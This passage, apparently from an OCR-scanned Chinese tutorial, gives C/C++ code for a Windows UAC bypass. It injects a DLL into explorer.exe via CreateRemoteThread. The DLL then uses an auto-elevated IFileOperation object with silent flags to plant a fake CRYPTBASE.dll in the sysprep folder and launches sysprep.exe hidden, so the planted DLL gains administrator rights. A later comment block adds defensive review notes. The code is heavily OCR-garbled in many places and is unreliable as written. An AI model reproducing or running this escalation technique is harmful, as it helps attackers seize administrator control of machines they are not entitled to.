else break; } } while (Process32Next(hSnap, &pey)); //LoadL i braryW函数的地址函数的地址 //要注入的dll的绝对路径 hKerne1=GetModu1eHand1e(L^Kerne132. dll"); //填充呵化仏结构 myinjl. myloadlibraryw=(pLoadLibraryW)GetProcAddress(hKernel, ^LoadLibrar yW〃); myinjl. myfreelibrary=(pFreeLibrary)GetProcAddress(hKernel, ^FreeLibrary^ ); //获取mydll.dll的绝对路径,mydll.dll和本程序在同一目录下 GetCurrentDirectoryW(sizeof(szbuffer), szbuffer); wcscat (szbuffer, L^Wmydll. dll"); //将mydll•dll的绝对路径写入explorer•exe进程的内存中,并且保存地址 myinjl. szFul1D1lName=(wchar_t*)VirtualAllocEx(hproc, 0, (wcslen(szbuffer) +1)*sizeof(wchar_t), MEM_COMMIT | PAGE_READffRITE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hproc, myinjl. szFullDllName, szbuffer, (wcslen(szbuffer )+1)*sizeof(wchar_t),&length); //^myinj1结构写入explorer.exe进程内存中,这个结构保存了LoadLibraryw和FreeL i brary函数的地址 lpparamter=VirtualAllocEx(hproc, 0, sizeof(inj), MEM_COMMIT | PAGE_READWRITE, PAGE_EXECUTE_READffRITE); WriteProcessMemory(hproc, lpparamter, &myinjl, sizeof(inj), &length); //将注入的代码写入£1口10^^故6进程内存中,注入的代码主要功能就是加载 mydll.犯1并且在加载后free. pstart=VirtualAl1ocEx(hproc, 0, (SIZE_T)&RemoteEnd-(SIZE_T)&RemoteStart, M EM_COMMIT | PAGE_READWRITE, PAGE_EXECUTE_READffRITE); WriteProcessMemory(hproc, pstart, &RemoteStart, (SIZE_T)&RemoteEnd-(SIZE_T )&RemoteStart, &length); //^EExplorer. 6义6中创建线程 CreateRemoteThread(hproc, 0, 0, (LPTHREAD_START_ROUTINE)pstart, lpparamter, 0,0); [/code] 下面我们看看RemoteStart的代码: [code]
/*
 * RemoteStart: the thread body that runs inside the target process.
 *
 * The injector above copies the raw bytes between &RemoteStart and &RemoteEnd
 * into memory it allocated in the target with VirtualAllocEx and starts them
 * with CreateRemoteThread, passing the address of the copied inj structure as
 * the thread parameter. Because only the bytes are copied, this function has
 * to be completely self-contained: it cannot call imports or touch string
 * literals or globals of its own module, which is presumably why the
 * LoadLibraryW / FreeLibrary addresses and the DLL path are handed in through
 * the structure rather than referenced directly.
 *
 * Behaviour: load the DLL named by szFullDllName, then immediately unload it.
 * Nothing else happens here, so whatever the DLL does must happen in its
 * DllMain (DLL_PROCESS_ATTACH) — see the mydll listing that follows.
 *
 * Defensive review notes:
 *  - No result check: if the load fails, hlib is NULL and myfreelibrary is
 *    still called with it. The injector likewise ignores the return values of
 *    WriteProcessMemory and CreateRemoteThread.
 *  - From a detection standpoint this is a remote thread whose start address
 *    lies in freshly allocated, executable (PAGE_EXECUTE_READWRITE) non-image
 *    memory, followed by an image load from the injector's current directory
 *    (GetCurrentDirectoryW + "\\mydll.dll"); both are commonly monitored
 *    events.
 *  - NOTE(review): PV0ID and HM0DULE read as OCR-garbled PVOID / HMODULE, and
 *    "lpparamter" as a misspelling of lpParameter — confirm against the
 *    original source before compiling. pinj looks like a pointer-to-inj
 *    typedef (the injector writes sizeof(inj) bytes to lpparamter) — verify.
 */
static void RemoteStart(PV0ID lpparamter)
{
    pinj pminj;
    HM0DULE hlib;

    pminj = (pinj)lpparamter; // lpparamter points to the inj structure written by the injector
    hlib = 0;                 // redundant: overwritten on the next line
    // Load the DLL at the path the injector placed in the target's memory.
    hlib = pminj->myloadlibraryw(pminj->szFullDllName);
    // Unload it right away; called even when hlib is NULL (load failed).
    pminj->myfreelibrary(hlib);
}
[/code] 接下来就是在mydlLdll中创建Ifileoperation对象,并且操作它复制文件了,然后 运行sysprep. exe来加载特殊的CRYPTBASE. 
dll。附件中的(mydll工程) [code] BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_cal1, LPYOID lpReserved switch (ul_reason_for_cal1) { case DLL_PROCESS_ATTACH: //表示dll被加载 { BIND_0PTS3 bo; IFileOperation * ifop=0; IShellItem *pIstsou=0; IShellItem *pIstdes=0; IShellItem *pIstdel=0; SHELLEXECUTEINFO seinfo={0}; wchar_t szMyFull[128] = {0}; //以单线程的方式创建COM对象 CoInitialize(NULL); //有时候0006切1^6(^通过命名绑定创建001对象并不会成功,则要调用 CoCreat e Instancea 建00旧对象。 if (S_OK==CoCreateInstance(—uuidof(FileOperation), 0, CLSCTX_LOCAL_SERVER |CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER, _uuidof(IFi1eOperation), (void* *)&ifop) II S_OK==CoGetObject(L^Elevation:Administrator!new:{3ad05575-8857-4850-9277-ll b85bdb8e09}", &bo, —uuidof(IFileOperation), (void**)&ifop)) /*设置IfileOperation,这个参数很重要 用IFileOperation这个COM对象来操作文件,和exploere.exe效果一样,复制文件的时候,当文件已经存在,会弹框请求是否覆盖,当要提权的时候,也会请求是否 继续。所以要通过设置?1&83让这些对话框都不显示出来,即静默。 F0F_N0C0NFIRMATI0N对于对话框,全部选择是 FOF_SILENT 不显示进度条 FOFX_REQUIREELEVATION 用户期望提升权限,不显示对话框*/ if(S_OK==ifop->SetOperationFlags(F0F_N0C0NFIRMATI0N | FOF_SILENT | FOFX_REQUIREELEVATION )) //复制 e:\mycryptbase. dll 到 c:\\windows\\system32\\sysprep 目录下并改名为 CRYPTBASE.dll if(S_OK==SHCreateItemFromParsingName(L"e:WmyCRYPTBASE. dll", 0,—uuidof( IShellItem), (void **)&pIstsou)) if(S_OK==SHCreat eItemFromPars i ngName(L"c:\\windows\\system32\\sysprep", 0,—uuidof(IShellItem), (void **)&pIstdes)) if(S_OK==ifop->CopyItem(pIstsou, pIstdes, L"CRYPTBASE. dll", 0)) if (S_OK==i f op->Perf ormOperat i ons ()) //执行操作 { //调用shellexecuteexw系统函数来运行878口作口. exe seinfo. cbSize=sizeof(SHELLEXECUTEINFO); seinfo. fMask=SEE_MASK_NOCLOSEPROCESS; seinfo. lpFile=L^c:\\windows\\system32\\sysprep\\sysprep. exe〃; seinfo. lpDirectory=0; seinfo. nShow=SW_HIDE; //隐藏程序窗 口 seinfo. lpParameters=0; if(ShellExecuteExW(&seinfo) && seinfo. hProcess) { ffaitForSingleObject(seinfo. hProcess, INFINITE); } //等待sysprep.exe执行完毕,删除目录下的cryptbase.sll文件 if(S_OK==SHCreat e11 emFromPars i ngName(L"c:\\windows\\system32\\sysprep\\ CRYPTBASE. 
dll〃,0,—uuidof(IShellItem), (void**)&pIstdel)) |